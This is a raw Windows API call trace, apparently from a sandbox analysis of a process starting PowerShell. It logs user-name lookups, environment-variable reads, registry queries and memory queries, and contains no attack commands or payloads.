	[0446.423] SetErrorMode (uMode=0x1) returned 0x1
	[0446.423] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d670 | out: lpFileInformation=0x12d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0446.424] SetErrorMode (uMode=0x1) returned 0x1
	[0446.466] CoTaskMemAlloc (cb=0x804) returned 0x1b7d88c0
	[0446.467] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7d88c0, nSize=0x12d9d8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d9d8) returned 0x1
	[0446.467] CoTaskMemFree (pv=0x1b7d88c0) 
	[0446.467] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.467] GetUserNameW (in: lpBuffer=0x334800, pcbBuffer=0x12da18 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12da18) returned 1
	[0446.467] CoTaskMemFree (pv=0x334800) 
	[0446.469] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d8ba40*="Available", lpRawData=0x3d8b7d0) returned 1
	[0446.473] CoTaskMemAlloc (cb=0x104) returned 0x2eaa90
	[0446.473] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaa90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0446.474] CoTaskMemFree (pv=0x2eaa90) 
	[0446.475] CoTaskMemAlloc (cb=0x104) returned 0x2eaa90
	[0446.475] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaa90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0446.475] CoTaskMemFree (pv=0x2eaa90) 
	[0446.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.482] CoTaskMemAlloc (cb=0x104) returned 0x2eaa90
	[0446.482] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x2eaa90, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0446.482] CoTaskMemFree (pv=0x2eaa90) 
	[0446.482] CoTaskMemAlloc (cb=0x104) returned 0x2eaa90
	[0446.482] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x2eaa90, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0446.482] CoTaskMemFree (pv=0x2eaa90) 
	[0446.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.485] GetCurrentProcessId () returned 0xc60
	[0446.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.490] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d9f8 | out: phkResult=0x12d9f8*=0x394) returned 0x0
	[0446.490] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d97c, lpData=0x0, lpcbData=0x12d978*=0x0 | out: lpType=0x12d97c*=0x1, lpData=0x0, lpcbData=0x12d978*=0x56) returned 0x0
	[0446.490] CoTaskMemAlloc (cb=0x5a) returned 0x1b7d23e0
	[0446.490] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d94c, lpData=0x1b7d23e0, lpcbData=0x12d948*=0x56 | out: lpType=0x12d94c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d948*=0x56) returned 0x0
	[0446.490] CoTaskMemFree (pv=0x1b7d23e0) 
	[0446.490] RegCloseKey (hKey=0x394) returned 0x0
	[0446.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.497] CoTaskMemAlloc (cb=0x104) returned 0x2eaa90
	[0446.497] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaa90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0446.497] CoTaskMemFree (pv=0x2eaa90) 
	[0446.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.542] VirtualQuery (in: lpAddress=0x12ba50, lpBuffer=0x12c910, dwLength=0x30 | out: lpBuffer=0x12c910*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0446.547] CoTaskMemAlloc (cb=0x104) returned 0x2eaa90
	[0446.547] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaa90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0446.547] CoTaskMemFree (pv=0x2eaa90) 
	[0446.560] CoTaskMemAlloc (cb=0x104) returned 0x2eaa90
	[0446.560] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaa90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0446.560] CoTaskMemFree (pv=0x2eaa90) 
	[0446.561] CoTaskMemAlloc (cb=0x104) returned 0x2eaa90
	[0446.561] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaa90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0446.561] CoTaskMemFree (pv=0x2eaa90) 
	[0446.561] CoTaskMemAlloc (cb=0x104) returned 0x2eaa90
	[0446.561] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaa90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0446.562] CoTaskMemFree (pv=0x2eaa90) 
	[0446.567] CoTaskMemAlloc (cb=0x104) returned 0x2eaa90
	[0446.567] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaa90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0446.567] CoTaskMemFree (pv=0x2eaa90) 
	[0446.573] CoTaskMemAlloc (cb=0x104) returned 0x2eaa90
	[0446.573] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaa90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0446.573] CoTaskMemFree (pv=0x2eaa90) 
	[0446.574] CoTaskMemAlloc (cb=0x104) returned 0x2eaa90
	[0446.575] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaa90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0446.575] CoTaskMemFree (pv=0x2eaa90) 
	[0446.581] VirtualQuery (in: lpAddress=0x12ba50, lpBuffer=0x12c910, dwLength=0x30 | out: lpBuffer=0x12c910*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0446.666] VirtualQuery (in: lpAddress=0x12ba50, lpBuffer=0x12c910, dwLength=0x30 | out: lpBuffer=0x12c910*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0446.677] CoTaskMemAlloc (cb=0x104) returned 0x2eaa90
	[0446.677] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaa90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0446.677] CoTaskMemFree (pv=0x2eaa90) 
	[0446.771] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2eaed0
	[0446.772] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2eafe0
	[0448.548] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0448.548] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0448.548] CoTaskMemFree (pv=0x2eb0f0) 
	[0448.880] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0448.880] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0448.880] CoTaskMemFree (pv=0x2eb0f0) 
	[0448.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0448.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0448.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0448.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0449.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0449.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0449.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0449.180] VirtualQuery (in: lpAddress=0x12bd00, lpBuffer=0x12cbc0, dwLength=0x30 | out: lpBuffer=0x12cbc0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0449.186] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12db58 | out: phkResult=0x12db58*=0x328) returned 0x0
	[0449.186] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12dadc, lpData=0x0, lpcbData=0x12dad8*=0x0 | out: lpType=0x12dadc*=0x1, lpData=0x0, lpcbData=0x12dad8*=0x56) returned 0x0
	[0449.186] CoTaskMemAlloc (cb=0x5a) returned 0x3a70d0
	[0449.186] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12daac, lpData=0x3a70d0, lpcbData=0x12daa8*=0x56 | out: lpType=0x12daac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12daa8*=0x56) returned 0x0
